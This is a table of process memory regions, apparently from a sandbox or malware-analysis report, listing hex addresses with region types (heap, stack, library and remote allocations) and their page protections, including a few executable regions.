|
heap
|
page read and write
|
||
212E4B30000
|
heap
|
page read and write
|
||
B6DC3FE000
|
stack
|
page read and write
|
||
22ECD520000
|
heap
|
page read and write
|
||
212E4D0C000
|
heap
|
page read and write
|
||
22ECD538000
|
heap
|
page read and write
|
||
2209A92A000
|
heap
|
page read and write
|
||
7FF848A10000
|
trusted library allocation
|
page execute and read and write
|
||
2793B910000
|
heap
|
page read and write
|
||
5AA0000
|
heap
|
page read and write
|
||
2CC1F3C5000
|
heap
|
page read and write
|
||
2CC1EA04000
|
heap
|
page read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
2CC1F3D2000
|
heap
|
page read and write
|
||
5C857FB000
|
stack
|
page read and write
|
||
2209C9ED000
|
trusted library allocation
|
page read and write
|
||
22ECF2C0000
|
heap
|
page read and write
|
||
2CC1CE70000
|
heap
|
page read and write
|
||
2CC1E9BD000
|
heap
|
page read and write
|
||
128C000
|
stack
|
page read and write
|
||
B6DC57F000
|
stack
|
page read and write
|
||
22ECD5E6000
|
heap
|
page read and write
|
||
22ECD663000
|
heap
|
page read and write
|
||
22ECD6FD000
|
heap
|
page read and write
|
||
2CC1EC5D000
|
heap
|
page read and write
|
||
2CC1EC95000
|
heap
|
page read and write
|
||
2CC1EC7F000
|
heap
|
page read and write
|
||
5CBBFFE000
|
stack
|
page read and write
|
||
2CC1ED04000
|
heap
|
page read and write
|
||
2CC1CC2E000
|
heap
|
page read and write
|
||
212E2DF6000
|
heap
|
page read and write
|
||
2CC1CECC000
|
heap
|
page read and write
|
||
27939EC1000
|
heap
|
page read and write
|
||
2209CC46000
|
trusted library allocation
|
page read and write
|
||
5C853F9000
|
stack
|
page read and write
|
||
2CC1EC50000
|
heap
|
page read and write
|
||
27939F0A000
|
heap
|
page read and write
|
||
2CC1EC79000
|
heap
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
2CC1ECF7000
|
heap
|
page read and write
|
||
22ECB7C3000
|
heap
|
page read and write
|
||
22ECB6A0000
|
heap
|
page read and write
|
||
2CC1E9E3000
|
heap
|
page read and write
|
||
2793B870000
|
trusted library allocation
|
page read and write
|
||
212E6678000
|
heap
|
page read and write
|
||
1C1ADC32000
|
trusted library allocation
|
page read and write
|
||
2CC1E9FF000
|
heap
|
page read and write
|
||
22ECD506000
|
heap
|
page read and write
|
||
7FF848843000
|
trusted library allocation
|
page execute and read and write
|
||
1C1ABD40000
|
trusted library allocation
|
page read and write
|
||
682E000
|
stack
|
page read and write
|
||
212E4B3C000
|
heap
|
page read and write
|
||
220B4920000
|
heap
|
page execute and read and write
|
||
1C1ABD00000
|
heap
|
page readonly
|
||
212E2DC2000
|
heap
|
page read and write
|
||
2793A080000
|
heap
|
page read and write
|
||
2209A996000
|
heap
|
page read and write
|
||
2CC1CECD000
|
heap
|
page read and write
|
||
2209CCAE000
|
trusted library allocation
|
page read and write
|
||
2BDA000
|
stack
|
page read and write
|
||
22ECB710000
|
heap
|
page read and write
|
||
212E4B19000
|
heap
|
page read and write
|
||
22ECD5AE000
|
heap
|
page read and write
|
||
2793A084000
|
heap
|
page read and write
|
||
27939EC9000
|
heap
|
page read and write
|
||
2CC1CC45000
|
heap
|
page read and write
|
||
5CBBEFF000
|
stack
|
page read and write
|
||
2209C99A000
|
trusted library allocation
|
page read and write
|
||
D58000
|
stack
|
page read and write
|
||
2CC1EC50000
|
heap
|
page read and write
|
||
22ECBA6D000
|
heap
|
page read and write
|
||
22ECD5B6000
|
heap
|
page read and write
|
||
27939E80000
|
heap
|
page read and write
|
||
27903201000
|
trusted library allocation
|
page read and write
|
||
F30000
|
trusted library allocation
|
page read and write
|
||
2CC1CBAA000
|
heap
|
page read and write
|
||
1C1AF410000
|
trusted library allocation
|
page read and write
|
||
22ECB7C6000
|
heap
|
page read and write
|
||
212E4BB2000
|
heap
|
page read and write
|
||
1C1BDC21000
|
trusted library allocation
|
page read and write
|
||
5180000
|
trusted library allocation
|
page read and write
|
||
F72000
|
trusted library allocation
|
page read and write
|
||
220B4A52000
|
heap
|
page read and write
|
||
212E4B11000
|
heap
|
page read and write
|
||
E1B69FD000
|
stack
|
page read and write
|
||
212E4B1F000
|
heap
|
page read and write
|
||
6B2C000
|
stack
|
page read and write
|
||
2CC1EC79000
|
heap
|
page read and write
|
||
220B4A30000
|
heap
|
page read and write
|
||
2209A840000
|
heap
|
page read and write
|
||
212E4B86000
|
heap
|
page read and write
|
||
212E4B57000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
7FF84882D000
|
trusted library allocation
|
page execute and read and write
|
||
220B4984000
|
heap
|
page read and write
|
||
2209C8EC000
|
trusted library allocation
|
page read and write
|
||
1C1C5F67000
|
heap
|
page read and write
|
||
7FF848823000
|
trusted library allocation
|
page execute and read and write
|
||
27908A01000
|
trusted library allocation
|
page read and write
|
||
27901401000
|
trusted library allocation
|
page read and write
|
||
220B4930000
|
heap
|
page read and write
|
||
2CC1E9CC000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
2CC1EC92000
|
heap
|
page read and write
|
||
22ECD547000
|
heap
|
page read and write
|
||
22ECB7CB000
|
heap
|
page read and write
|
||
1C1C5F54000
|
heap
|
page read and write
|
||
27939E40000
|
heap
|
page read and write
|
||
1C1BDC2D000
|
trusted library allocation
|
page read and write
|
||
22ECBA69000
|
heap
|
page read and write
|
||
212E2F3E000
|
heap
|
page read and write
|
||
22ECF0CE000
|
heap
|
page read and write
|
||
4D9D000
|
stack
|
page read and write
|
||
22ECB792000
|
heap
|
page read and write
|
||
12D0000
|
trusted library allocation
|
page read and write
|
||
6C6E000
|
stack
|
page read and write
|
||
2209A908000
|
heap
|
page read and write
|
||
22ECD600000
|
heap
|
page read and write
|
||
2CC1EA3D000
|
heap
|
page read and write
|
||
F60000
|
trusted library allocation
|
page read and write
|
||
22ECBA68000
|
heap
|
page read and write
|
||
22ECD51B000
|
heap
|
page read and write
|
||
2CC1ECBF000
|
heap
|
page read and write
|
||
7FF8489C2000
|
trusted library allocation
|
page read and write
|
||
B6DC37C000
|
stack
|
page read and write
|
||
212E2F00000
|
heap
|
page read and write
|
||
2CC1E9DB000
|
heap
|
page read and write
|
||
11CE000
|
stack
|
page read and write
|
||
22ECB719000
|
heap
|
page read and write
|
||
2CC1EC1D000
|
heap
|
page read and write
|
||
22ECB7C5000
|
heap
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
212E2DF3000
|
heap
|
page read and write
|
||
22ECD7B4000
|
heap
|
page read and write
|
||
212E2DC2000
|
heap
|
page read and write
|
||
7FF8489FA000
|
trusted library allocation
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
212E4B26000
|
heap
|
page read and write
|
||
7FF848A02000
|
trusted library allocation
|
page read and write
|
||
1C1C5F50000
|
heap
|
page read and write
|
||
1C1ABBFE000
|
heap
|
page read and write
|
||
2CC1F3A0000
|
heap
|
page read and write
|
||
5C8527E000
|
stack
|
page read and write
|
||
22ECD532000
|
heap
|
page read and write
|
||
2209CC67000
|
trusted library allocation
|
page read and write
|
||
2CC1CC2E000
|
heap
|
page read and write
|
||
1C1ABDC4000
|
heap
|
page read and write
|
||
22ECBA6E000
|
heap
|
page read and write
|
||
1C1AD57A000
|
heap
|
page read and write
|
||
220B4A1E000
|
heap
|
page read and write
|
||
5C855FE000
|
stack
|
page read and write
|
||
212E2DFB000
|
heap
|
page read and write
|
||
7FF848940000
|
trusted library allocation
|
page execute and read and write
|
||
67AE000
|
stack
|
page read and write
|
||
C833D7E000
|
stack
|
page read and write
|
||
2CC1EC1F000
|
heap
|
page read and write
|
||
22ECB72B000
|
heap
|
page read and write
|
||
2CC1F588000
|
heap
|
page read and write
|
||
2CC1CC6B000
|
heap
|
page read and write
|
||
51C0000
|
heap
|
page read and write
|
||
1C1ABC25000
|
heap
|
page read and write
|
||
65F2000
|
heap
|
page read and write
|
||
2CC1F4FF000
|
heap
|
page read and write
|
||
F10000
|
heap
|
page read and write
|
||
1C1ADBB1000
|
trusted library allocation
|
page read and write
|
||
22ECD520000
|
heap
|
page read and write
|
||
22ECD550000
|
heap
|
page read and write
|
||
22ECD50F000
|
heap
|
page read and write
|
||
1C1ABA50000
|
heap
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
2793BDE1000
|
trusted library allocation
|
page read and write
|
||
1C1BDBB1000
|
trusted library allocation
|
page read and write
|
||
212E4BFB000
|
heap
|
page read and write
|
||
212E4B1C000
|
heap
|
page read and write
|
||
22ECD7B5000
|
heap
|
page read and write
|
||
2CC1CECE000
|
heap
|
page read and write
|
||
22ECB720000
|
heap
|
page read and write
|
||
212E2F30000
|
heap
|
page read and write
|
||
22ECB70B000
|
heap
|
page read and write
|
||
2CC1CC2E000
|
heap
|
page read and write
|
||
212E4DB5000
|
heap
|
page read and write
|
||
212E4B54000
|
heap
|
page read and write
|
||
212E6670000
|
heap
|
page read and write
|
||
B6DD0CB000
|
stack
|
page read and write
|
||
7FF84885B000
|
trusted library allocation
|
page read and write
|
||
220B49F4000
|
heap
|
page read and write
|
||
F90000
|
trusted library allocation
|
page read and write
|
||
22ECD527000
|
heap
|
page read and write
|
||
2CC1E9EC000
|
heap
|
page read and write
|
||
2209C530000
|
heap
|
page read and write
|
||
2CC1F580000
|
heap
|
page read and write
|
||
212E4BAA000
|
heap
|
page read and write
|
||
1C1AE7DC000
|
trusted library allocation
|
page read and write
|
||
B6DBB92000
|
stack
|
page read and write
|
||
1C1BDBC0000
|
trusted library allocation
|
page read and write
|
||
2CC1CC7E000
|
heap
|
page read and write
|
||
10C4000
|
heap
|
page read and write
|
||
7FF8489E0000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
22ECB71F000
|
heap
|
page read and write
|
||
5101000
|
trusted library allocation
|
page read and write
|
||
22ECD576000
|
heap
|
page read and write
|
||
2CC1EC73000
|
heap
|
page read and write
|
||
2CC1EA0A000
|
heap
|
page read and write
|
||
5C84DFE000
|
stack
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
22ECD527000
|
heap
|
page read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
220AC8F0000
|
trusted library allocation
|
page read and write
|
||
D4818FF000
|
stack
|
page read and write
|
||
22ECD5A5000
|
heap
|
page read and write
|
||
2CC1ECF2000
|
heap
|
page read and write
|
||
2CC1F480000
|
heap
|
page read and write
|
||
212E4B3B000
|
heap
|
page read and write
|
||
212E4BEE000
|
heap
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page read and write
|
||
2209C906000
|
trusted library allocation
|
page read and write
|
||
212E2E03000
|
heap
|
page read and write
|
||
1C1ABBE8000
|
heap
|
page read and write
|
||
5A60000
|
trusted library allocation
|
page read and write
|
||
B6DC2F9000
|
stack
|
page read and write
|
||
E1B65FF000
|
stack
|
page read and write
|
||
6A2C000
|
stack
|
page read and write
|
||
2CC1CBAE000
|
heap
|
page read and write
|
||
C833DFD000
|
stack
|
page read and write
|
||
B6DC278000
|
stack
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
5CBC0FE000
|
stack
|
page read and write
|
||
E1B66FE000
|
stack
|
page read and write
|
||
212E4B37000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
2CC1EA3D000
|
heap
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
2793BD26000
|
heap
|
page execute and read and write
|
||
65DE000
|
heap
|
page read and write
|
||
2209CD12000
|
trusted library allocation
|
page read and write
|
||
2209CCF6000
|
trusted library allocation
|
page read and write
|
||
7FF848A30000
|
trusted library allocation
|
page read and write
|
||
2CC1ECBF000
|
heap
|
page read and write
|
||
2CC1E9FF000
|
heap
|
page read and write
|
||
F4D000
|
trusted library allocation
|
page execute and read and write
|
||
22ECB7BB000
|
heap
|
page read and write
|
||
50E0000
|
trusted library allocation
|
page read and write
|
||
7FF848822000
|
trusted library allocation
|
page read and write
|
||
D481BFE000
|
stack
|
page read and write
|
||
212E2CF0000
|
heap
|
page read and write
|
||
212E4BE5000
|
heap
|
page read and write
|
||
212E4B1F000
|
heap
|
page read and write
|
||
1C1ABC2A000
|
heap
|
page read and write
|
||
C5B000
|
stack
|
page read and write
|
||
220B4A2D000
|
heap
|
page read and write
|
||
212E4B71000
|
heap
|
page read and write
|
||
50F2000
|
trusted library allocation
|
page read and write
|
||
212E4B10000
|
heap
|
page read and write
|
||
22ECD504000
|
heap
|
page read and write
|
||
2CC1EC94000
|
heap
|
page read and write
|
||
2CC1EC19000
|
heap
|
page read and write
|
||
212E2E94000
|
heap
|
page read and write
|
||
5500000
|
heap
|
page read and write
|
||
2793B890000
|
trusted library allocation
|
page read and write
|
||
212E2DFF000
|
heap
|
page read and write
|
||
2CC1E9BF000
|
heap
|
page read and write
|
||
22ECD533000
|
heap
|
page read and write
|
||
C8342BE000
|
stack
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
2CC1E9B1000
|
heap
|
page read and write
|
||
212E2DD2000
|
heap
|
page read and write
|
||
2CC1CEC8000
|
heap
|
page read and write
|
||
1C1ABBE4000
|
heap
|
page read and write
|
||
27903C01000
|
trusted library allocation
|
page read and write
|
||
22ECB7BC000
|
heap
|
page read and write
|
||
E1B63FE000
|
stack
|
page read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
2209AAB0000
|
trusted library allocation
|
page read and write
|
||
7F470000
|
trusted library allocation
|
page execute and read and write
|
||
3C01000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
54AC000
|
stack
|
page read and write
|
||
2CC1ECF8000
|
heap
|
page read and write
|
||
212E4B20000
|
heap
|
page read and write
|
||
22ECD509000
|
heap
|
page read and write
|
||
2209CE83000
|
trusted library allocation
|
page read and write
|
||
2CC1CB80000
|
heap
|
page read and write
|
||
1C1ADA70000
|
heap
|
page execute and read and write
|
||
2209A936000
|
heap
|
page read and write
|
||
7FF848926000
|
trusted library allocation
|
page execute and read and write
|
||
212E2E03000
|
heap
|
page read and write
|
||
2CC1EA3D000
|
heap
|
page read and write
|
||
212E4BFF000
|
heap
|
page read and write
|
||
2209C536000
|
heap
|
page read and write
|
||
2CC1EC73000
|
heap
|
page read and write
|
||
2790A801000
|
trusted library allocation
|
page read and write
|
||
22ECD58E000
|
heap
|
page read and write
|
||
1C1C5F7F000
|
heap
|
page read and write
|
||
2CC1EEA0000
|
trusted library allocation
|
page read and write
|
||
22ECD501000
|
heap
|
page read and write
|
||
7FF8489F0000
|
trusted library allocation
|
page execute and read and write
|
||
1C1ABDCE000
|
heap
|
page read and write
|
||
212E4B25000
|
heap
|
page read and write
|
||
212E4B11000
|
heap
|
page read and write
|
||
2209C9B1000
|
trusted library allocation
|
page read and write
|
||
102C000
|
stack
|
page read and write
|
||
571D000
|
stack
|
page read and write
|
||
2CC1EC5E000
|
heap
|
page read and write
|
||
2209A830000
|
heap
|
page read and write
|
||
22ECB725000
|
heap
|
page read and write
|
||
22ECD6FE000
|
heap
|
page read and write
|
||
2CC1CC6B000
|
heap
|
page read and write
|
||
212E2E03000
|
heap
|
page read and write
|
||
22ECB7B9000
|
heap
|
page read and write
|
||
50E4000
|
trusted library allocation
|
page read and write
|
||
5C852FF000
|
stack
|
page read and write
|
||
27908001000
|
trusted library allocation
|
page read and write
|
||
22ECD50C000
|
heap
|
page read and write
|
||
212E4B48000
|
heap
|
page read and write
|
||
212E4BF6000
|
heap
|
page read and write
|
||
2209C997000
|
trusted library allocation
|
page read and write
|
||
2209CDEC000
|
trusted library allocation
|
page read and write
|
||
22ECD544000
|
heap
|
page read and write
|
||
2209CE3A000
|
trusted library allocation
|
page read and write
|
||
5A41000
|
trusted library allocation
|
page read and write
|
||
212E2D50000
|
heap
|
page read and write
|
||
7FF848830000
|
trusted library allocation
|
page read and write
|
||
7FF848A30000
|
trusted library allocation
|
page execute and read and write
|
||
22ECD5DE000
|
heap
|
page read and write
|
||
212E2E03000
|
heap
|
page read and write
|
||
212E2F38000
|
heap
|
page read and write
|
||
22ECB72F000
|
heap
|
page read and write
|
||
5CBBAF9000
|
stack
|
page read and write
|
||
2CC1F426000
|
heap
|
page read and write
|
||
5106000
|
trusted library allocation
|
page read and write
|
||
2CC1EBE0000
|
heap
|
page read and write
|
||
22ECB726000
|
heap
|
page read and write
|
||
F5D000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1CECE000
|
heap
|
page read and write
|
||
7FF848842000
|
trusted library allocation
|
page read and write
|
||
212E4B5C000
|
heap
|
page read and write
|
||
2CC1CC01000
|
heap
|
page read and write
|
||
1C1AF3E5000
|
trusted library allocation
|
page read and write
|
||
E1B5D24000
|
stack
|
page read and write
|
||
F43000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1EC00000
|
heap
|
page read and write
|
||
22ECB7BE000
|
heap
|
page read and write
|
||
2209C91A000
|
trusted library allocation
|
page read and write
|
||
7FF8488DC000
|
trusted library allocation
|
page execute and read and write
|
||
5C84DB3000
|
stack
|
page read and write
|
||
212E4D0E000
|
heap
|
page read and write
|
||
5C8507E000
|
unkown
|
page read and write
|
||
212E2DF0000
|
heap
|
page read and write
|
||
2793B8F0000
|
heap
|
page read and write
|
||
2209C520000
|
heap
|
page read and write
|
||
2209CFAA000
|
trusted library allocation
|
page read and write
|
||
2209CCF1000
|
trusted library allocation
|
page read and write
|
||
2CC1F3A9000
|
heap
|
page read and write
|
||
2209AAE0000
|
heap
|
page readonly
|
||
1C1C5BD0000
|
heap
|
page read and write
|
||
5C850FE000
|
stack
|
page read and write
|
||
117F000
|
heap
|
page read and write
|
||
220B4986000
|
heap
|
page read and write
|
||
1C1AF7B3000
|
trusted library allocation
|
page read and write
|
||
B6DC5FB000
|
stack
|
page read and write
|
||
C833E7F000
|
stack
|
page read and write
|
||
2CC1EC05000
|
heap
|
page read and write
|
||
2209A8EE000
|
heap
|
page read and write
|
||
22ECB710000
|
heap
|
page read and write
|
||
212E2F38000
|
heap
|
page read and write
|
||
2CC1CB88000
|
heap
|
page read and write
|
||
2CC1CBD8000
|
heap
|
page read and write
|
||
2CC1F588000
|
heap
|
page read and write
|
||
212E2DEF000
|
heap
|
page read and write
|
||
220B4A15000
|
heap
|
page read and write
|
||
2CC1CC6B000
|
heap
|
page read and write
|
||
212E2DFB000
|
heap
|
page read and write
|
||
27939E50000
|
heap
|
page read and write
|
||
2CC1CC45000
|
heap
|
page read and write
|
||
1C1C5BB0000
|
heap
|
page read and write
|
||
212E4B37000
|
heap
|
page read and write
|
||
2CC1EC50000
|
heap
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
7FF8488F0000
|
trusted library allocation
|
page read and write
|
||
2CC1ECBF000
|
heap
|
page read and write
|
||
5C85578000
|
stack
|
page read and write
|
||
2CC1E9B5000
|
heap
|
page read and write
|
||
2CC1E9B2000
|
heap
|
page read and write
|
||
212E2D4A000
|
heap
|
page read and write
|
||
2CC1CC7C000
|
heap
|
page read and write
|
||
1C1ABD43000
|
trusted library allocation
|
page read and write
|
||
220B48F0000
|
heap
|
page execute and read and write
|
||
212E4B2B000
|
heap
|
page read and write
|
||
E1B6BFB000
|
stack
|
page read and write
|
||
B6DBF7E000
|
stack
|
page read and write
|
||
22ECD5BA000
|
heap
|
page read and write
|
||
212E2DE9000
|
heap
|
page read and write
|
||
6D6E000
|
stack
|
page read and write
|
||
627E000
|
stack
|
page read and write
|
||
7FF848A60000
|
trusted library allocation
|
page read and write
|
||
65B0000
|
heap
|
page read and write
|
||
212E2DF3000
|
heap
|
page read and write
|
||
B6DBBDF000
|
stack
|
page read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
212E2DFB000
|
heap
|
page read and write
|
||
22ECB7C3000
|
heap
|
page read and write
|
||
1C1C5C99000
|
heap
|
page read and write
|
||
22ECB79D000
|
heap
|
page read and write
|
||
1C1C5C0A000
|
heap
|
page read and write
|
||
1C1ABBA0000
|
heap
|
page read and write
|
||
2CC1EBD0000
|
remote allocation
|
page read and write
|
||
3C29000
|
trusted library allocation
|
page read and write
|
||
6450000
|
heap
|
page read and write
|
||
2CC1E9C4000
|
heap
|
page read and write
|
||
27939E88000
|
heap
|
page read and write
|
||
212E2D20000
|
heap
|
page read and write
|
||
5469000
|
stack
|
page read and write
|
||
2CC1CBD8000
|
heap
|
page read and write
|
||
5170000
|
trusted library allocation
|
page read and write
|
||
212E2DF1000
|
heap
|
page read and write
|
||
212E2E90000
|
heap
|
page read and write
|
||
6460000
|
heap
|
page read and write
|
||
2793B916000
|
heap
|
page read and write
|
||
212E4B14000
|
heap
|
page read and write
|
||
22ECD586000
|
heap
|
page read and write
|
||
1C1C5C5F000
|
heap
|
page read and write
|
||
22ECBA60000
|
heap
|
page read and write
|
||
212E2F35000
|
heap
|
page read and write
|
||
220B4936000
|
heap
|
page read and write
|
||
212E4B9E000
|
heap
|
page read and write
|
||
2209A8A0000
|
heap
|
page read and write
|
||
2CC1ECBF000
|
heap
|
page read and write
|
||
212E4BE5000
|
heap
|
page read and write
|
||
1C1C5BFC000
|
heap
|
page read and write
|
||
1C1ADBA0000
|
heap
|
page read and write
|
||
1C1ADDDC000
|
trusted library allocation
|
page read and write
|
||
22ECD59A000
|
heap
|
page read and write
|
||
2209C8CE000
|
trusted library allocation
|
page read and write
|
||
22ECB71A000
|
heap
|
page read and write
|
||
2CC1E9B8000
|
heap
|
page read and write
|
||
B6DD04D000
|
stack
|
page read and write
|
||
2CC1EC14000
|
heap
|
page read and write
|
||
212E4B60000
|
heap
|
page read and write
|
||
27909401000
|
trusted library allocation
|
page read and write
|
||
D4815E9000
|
stack
|
page read and write
|
||
1C1AF7B8000
|
trusted library allocation
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
5CBC1FF000
|
stack
|
page read and write
|
||
1C1C5F40000
|
heap
|
page read and write
|
||
212E4B37000
|
heap
|
page read and write
|
||
5C861CE000
|
stack
|
page read and write
|
||
1C1C5C16000
|
heap
|
page read and write
|
||
D481CFF000
|
stack
|
page read and write
|
||
109B000
|
heap
|
page read and write
|
||
22ECD710000
|
heap
|
page read and write
|
||
2CC1CB00000
|
heap
|
page read and write
|
||
212E4D0D000
|
heap
|
page read and write
|
||
1132000
|
heap
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
2CC1EA0A000
|
heap
|
page read and write
|
||
220B494A000
|
heap
|
page read and write
|
||
2CC1E9C7000
|
heap
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
22ECD501000
|
heap
|
page read and write
|
||
2209ABB0000
|
heap
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
2CC1F59E000
|
heap
|
page read and write
|
||
1C1ABCD0000
|
trusted library allocation
|
page read and write
|
||
2CC1E9E0000
|
heap
|
page read and write
|
||
2CC1EA3D000
|
heap
|
page read and write
|
||
212E2D4F000
|
heap
|
page read and write
|
||
212E2D4A000
|
heap
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
1C1AED16000
|
trusted library allocation
|
page read and write
|
||
F15000
|
heap
|
page read and write
|
||
1C1C5C7C000
|
heap
|
page read and write
|
||
2CC1CC6B000
|
heap
|
page read and write
|
||
59BE000
|
stack
|
page read and write
|
||
2CC1CBBD000
|
heap
|
page read and write
|
||
1C1ABBB6000
|
heap
|
page read and write
|
||
5120000
|
trusted library allocation
|
page read and write
|
||
2CC1CBE7000
|
heap
|
page read and write
|
||
2CC1EC24000
|
heap
|
page read and write
|
||
27939F0D000
|
heap
|
page read and write
|
||
B6DC4FE000
|
stack
|
page read and write
|
||
1C1C5F61000
|
heap
|
page read and write
|
||
22ECD5C6000
|
heap
|
page read and write
|
||
2209A8E0000
|
heap
|
page read and write
|
||
2CC1E9FF000
|
heap
|
page read and write
|
||
2209C9E7000
|
trusted library allocation
|
page read and write
|
||
212E4B17000
|
heap
|
page read and write
|
||
2793A050000
|
heap
|
page read and write
|
||
2CC1CEC0000
|
heap
|
page read and write
|
||
5C854FC000
|
stack
|
page read and write
|
||
2CC1F580000
|
heap
|
page read and write
|
||
2CC1F3AC000
|
heap
|
page read and write
|
||
22ECB7C1000
|
heap
|
page read and write
|
||
1C1ABCF0000
|
trusted library allocation
|
page read and write
|
||
12F6000
|
heap
|
page read and write
|
||
212E4B63000
|
heap
|
page read and write
|
||
212E2E03000
|
heap
|
page read and write
|
||
2CC1EC11000
|
heap
|
page read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
27939ECB000
|
heap
|
page read and write
|
||
212E2D28000
|
heap
|
page read and write
|
||
7FF8489E0000
|
trusted library allocation
|
page read and write
|
||
1104000
|
heap
|
page read and write
|
||
27902801000
|
trusted library allocation
|
page read and write
|
||
5A70000
|
trusted library allocation
|
page execute and read and write
|
||
2793B8B0000
|
trusted library allocation
|
page read and write
|
||
2209AB60000
|
trusted library allocation
|
page read and write
|
||
2209C4B0000
|
heap
|
page execute and read and write
|
||
212E2E03000
|
heap
|
page read and write
|
||
2BE0000
|
trusted library allocation
|
page read and write
|
||
EFE000
|
stack
|
page read and write
|
||
124E000
|
stack
|
page read and write
|
||
2793B830000
|
heap
|
page read and write
|
||
2CC1CC43000
|
heap
|
page read and write
|
||
D481EFE000
|
stack
|
page read and write
|
||
5C851FD000
|
stack
|
page read and write
|
||
2CC1EC18000
|
heap
|
page read and write
|
||
7FF848A90000
|
trusted library allocation
|
page read and write
|
||
FEE000
|
stack
|
page read and write
|
||
212E4BCA000
|
heap
|
page read and write
|
||
67ED000
|
stack
|
page read and write
|
||
2CC1EC73000
|
heap
|
page read and write
|
||
B6DBEFE000
|
stack
|
page read and write
|
||
22ECD579000
|
heap
|
page read and write
|
||
2209C9AB000
|
trusted library allocation
|
page read and write
|
||
2CC1E9B4000
|
heap
|
page read and write
|
||
2CC1F3A1000
|
heap
|
page read and write
|
||
22ECD524000
|
heap
|
page read and write
|
||
2CC1F490000
|
heap
|
page read and write
|
||
212E6870000
|
trusted library allocation
|
page read and write
|
||
22ECD5EF000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
F66000
|
trusted library allocation
|
page execute and read and write
|
||
212E2D5F000
|
heap
|
page read and write
|
||
212E4B30000
|
heap
|
page read and write
|
||
22ECB7C0000
|
heap
|
page read and write
|
||
22ECB7CB000
|
heap
|
page read and write
|
||
22ECD527000
|
heap
|
page read and write
|
||
212E2D5D000
|
heap
|
page read and write
|
||
27939EE1000
|
heap
|
page read and write
|
||
2209ABB5000
|
heap
|
page read and write
|
||
212E4D0E000
|
heap
|
page read and write
|
||
2CC1CBE7000
|
heap
|
page read and write
|
||
2209CC8E000
|
trusted library allocation
|
page read and write
|
||
1C1AF46B000
|
trusted library allocation
|
page read and write
|
||
2CC1CC43000
|
heap
|
page read and write
|
||
B6DC07E000
|
stack
|
page read and write
|
||
F53000
|
trusted library allocation
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
B6DCFCE000
|
stack
|
page read and write
|
||
2CC1F59E000
|
heap
|
page read and write
|
||
2209A934000
|
heap
|
page read and write
|
||
2CC1EC79000
|
heap
|
page read and write
|
||
2CC1EE90000
|
heap
|
page read and write
|
||
22ECB726000
|
heap
|
page read and write
|
||
2CC1CC2E000
|
heap
|
page read and write
|
||
7FF8489C0000
|
trusted library allocation
|
page read and write
|
||
2CC1CC34000
|
heap
|
page read and write
|
||
2CC1F580000
|
heap
|
page read and write
|
||
6B6C000
|
stack
|
page read and write
|
||
212E4B37000
|
heap
|
page read and write
|
||
2793B91A000
|
heap
|
page read and write
|
||
F7B000
|
trusted library allocation
|
page execute and read and write
|
||
2209CE02000
|
trusted library allocation
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
F44000
|
trusted library allocation
|
page read and write
|
||
220B49EC000
|
heap
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page execute and read and write
|
||
212E2DF0000
|
heap
|
page read and write
|
||
22ECD5E4000
|
heap
|
page read and write
|
||
2CC1E9F4000
|
heap
|
page read and write
|
||
212E4B4F000
|
heap
|
page read and write
|
||
2CC1E9D7000
|
heap
|
page read and write
|
||
2209C99D000
|
trusted library allocation
|
page read and write
|
||
2BED000
|
trusted library allocation
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
7FF848A10000
|
trusted library allocation
|
page execute and read and write
|
||
1C1ABCA0000
|
heap
|
page read and write
|
||
220B4EA0000
|
heap
|
page read and write
|
||
212E2DFB000
|
heap
|
page read and write
|
||
2CC1CC6B000
|
heap
|
page read and write
|
||
B6DC17E000
|
stack
|
page read and write
|
||
1C1AF55C000
|
trusted library allocation
|
page read and write
|
||
2B9F000
|
stack
|
page read and write
|
||
7FF848850000
|
trusted library allocation
|
page read and write
|
||
22ECD5D5000
|
heap
|
page read and write
|
||
27909E01000
|
trusted library allocation
|
page read and write
|
||
1C1BDD64000
|
trusted library allocation
|
page read and write
|
||
2CC1ECFA000
|
heap
|
page read and write
|
||
120E000
|
stack
|
page read and write
|
||
2CC1CEB0000
|
heap
|
page read and write
|
||
22ECD6FE000
|
heap
|
page read and write
|
||
2209CF8A000
|
trusted library allocation
|
page read and write
|
||
2CC1E9DB000
|
heap
|
page read and write
|
